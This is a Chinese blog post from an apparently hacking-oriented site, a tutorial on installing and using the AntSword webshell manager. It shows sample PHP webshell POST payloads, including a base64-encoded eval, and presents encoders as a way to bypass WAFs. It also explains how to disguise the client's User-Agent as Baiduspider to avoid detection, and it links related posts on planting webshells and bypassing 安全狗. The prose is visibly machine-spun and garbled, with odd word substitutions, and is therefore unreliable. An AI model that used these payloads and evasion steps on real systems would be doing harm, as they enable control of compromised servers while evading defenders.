中国蚁剑是一款开源系统的混合开发网址可视化工具,它关键朝向于

hacker5年前黑客文章857

中国蚁剑是一款开源系统的混合开发网址可视化工具,它关键朝向于合理合法受权的网站渗透测试安全性工作人员及其开展基本实际操作的系统管理员。

 

通俗化的讲:中国蚁剑是 一 款比水果刀还牛的shell操纵端手机软件。

 

中国蚁剑青睐模块化设计的开发设计观念,遵照开源系统,就需要开得好看的标准,着眼于为不一样层级的群体出示最简单易懂、便捷立即的编码展现以及改动表明,勤奋让大伙儿能够一起为这一新项目奉献出有意义的事的一点一滴,让这个专用工具真实能让大伙儿用得顺意、舒服,让它能为大伙儿使出出最个性化最合适你的工作能力!

 

一、中国蚁剑免费下载

唯一官方网github下载链接:https://github.com/AntSwordProject/

 

留意:我们下载的情况下必须免费下载2个一部分,一个是新项目关键源代码”antSword“,另一个是加载器;加载器则分成三个版本号:Mac、Windows、Linux。中国蚁剑免费下载

二、中国蚁剑安裝

因为我下载的是“AntSword-Loader-v4.0.3-win32-x64.zip”,我也以Windows版本号64位来实例了。

 

1、大家缓解压力“AntSword-Loader-v4.0.3-win32-x64.zip”后,双击鼠标“AntSword.exe”;

之一次安裝新项目必须先复位,假如你早已安装了关键源代码,就挑选新项目源代码的文件夹名称。(假如只安装了加载器,挑选一个空文件夹名称,加载器会全自动帮你下载关键新项目源代码)。

留意:这一新项目文件夹名称是你之后必须备份数据的,储存着你的shell和shell内的材料。

中国蚁剑 复位

2、等复位进行后,再双击鼠标“AntSword.exe”就可以一切正常起动!

中国蚁剑起动页面

 

三、中国蚁剑应用

应用实际上跟水果刀基本上类似,仅仅蚁剑作用更强劲一些,下边就简易给大伙说说:

 

1、加上一个shell

更先:右键单击 - 加上数据信息;

中国蚁剑

 

次之:键入URL详细地址,联接登陆密码及其编号设定。PHP語言强烈推荐在线编辑器应用chr数据加密

中国蚁剑 shell联接

 

再度:假如必须自身写伺服电机的数据加密种类,能够按下面的图来实际操作:

中国蚁剑伺服电机自定

 

从次:还能够配备shell的恳求信息内容和post內容;

中国蚁剑恳求信息内容和post內容

 

最终:还能够配备全局 *** ;中国蚁剑配备全局代理

 

2、软件

中国蚁剑有一个软件销售市场,能够安裝一些软件,软件有很多。下列是部分软件截屏:

中国蚁剑软件

 

3、有关伺服电机

伺服电机是这一程序流程的独到之处,用伺服电机数据加密能够轻轻松松绕开WAF。

 

何不,大家来比照一下默认设置不应用编号传送和base64编号传送的差别:

base64编号

 

密文传送,post內容为:

[email protected]_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_exists("posix_getegid"))[email protected]_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;echo "8e51f";die();

 

base64数据加密,post內容为:

_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&[email protected](@base64_decode($_POST[_0x4ee8506e59871]));

 

留意:在其中,ant主要参数名字是shell登陆密码。

 

再讨论一下chr编号传送,彻底就所有编号了。

chr编号

 

4、user-agent改动

要留意的是,手机软件默认设置的user-agent是:User-Agent: antSword/v2.0;并且绝大多数人都不容易去自定useragent,这就给waf和蜜獾白白的送了一个特点,因此我们要改动一下源码:

 

改动新项目相对路径:

antSword\modules\request.js (改动const USER_AGENT = 'antSword/v2.1'; 这一行编码!)

antSword\modules\update.js (有多处要改动;可检索“antSword/v2.0”来寻找这二行编码!)

 

我这里是把antSword/v2.0antSword/v2.1改动以便Baiduspider-image,我改为了百度图片搜索引擎蜘蛛;

 

假如大伙儿有没有什么不明白的,请查询汉语使用说明:https://doc.u0u.us/zh-hans/

标签: 黑客技术

相关文章

TripwireCorp企业如今致力于付钱公司配备操纵商品

TripwireCorp企业如今致力于付钱公司配备操纵商品

什么叫Tripwire? Tripwire是一个文件目录和文档md5验证器。此专用工具可协助计算机管理员和客户查验特定的文档集以开展变更。该专用工具能够 通告管理人员是不是有伪造或毁坏的文档,因而能...

Ecshop后台拿shell方法(版本自测)

Ecshop后台拿shell方法(版本自测)

方法一、 进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images...

绕过安全狗拦截拿webshell

将大马写到一个txt文件里面,命名为chnlanker.txt 再建一个文本文档,asp的就写入: <!–#include file=”chncto.txt”–>保存为x.asp...

SolarWinds服务器防火墙安全性管理工具

SolarWinds服务器防火墙安全性管理工具

什么叫SolarWinds? SolarWinds服务器防火墙安全性管理工具(FSM)针对必须在其重要安全防护设备上开展汇报和权威专家管理方法的机构和企业而言是一个非常好的解决方法。该商品的设定和配...

THCAmap使用方法

THCAmap使用方法

依据关键创作者和开发者的叫法,THC Amap是一个网络黑客和渗入专用工具,是实行程序运行协议书检验的第一个专用工具。可是,一定要注意,假如您对这一迷你型专用工具很感兴趣,那麼您将会最好是应用nma...

黑客入侵电脑的方法_黑客怎样入侵别人的电脑

我们经常听到说黑客做什么事情了,又入侵哪个网站了,或者听说黑客进入谁的电脑了,窃取别人电脑的什么资料了,等等。黑客对于我们来说有些神秘。黑客怎样入侵别人的电脑的呢?下面的4点让您对黑客入侵有一定的...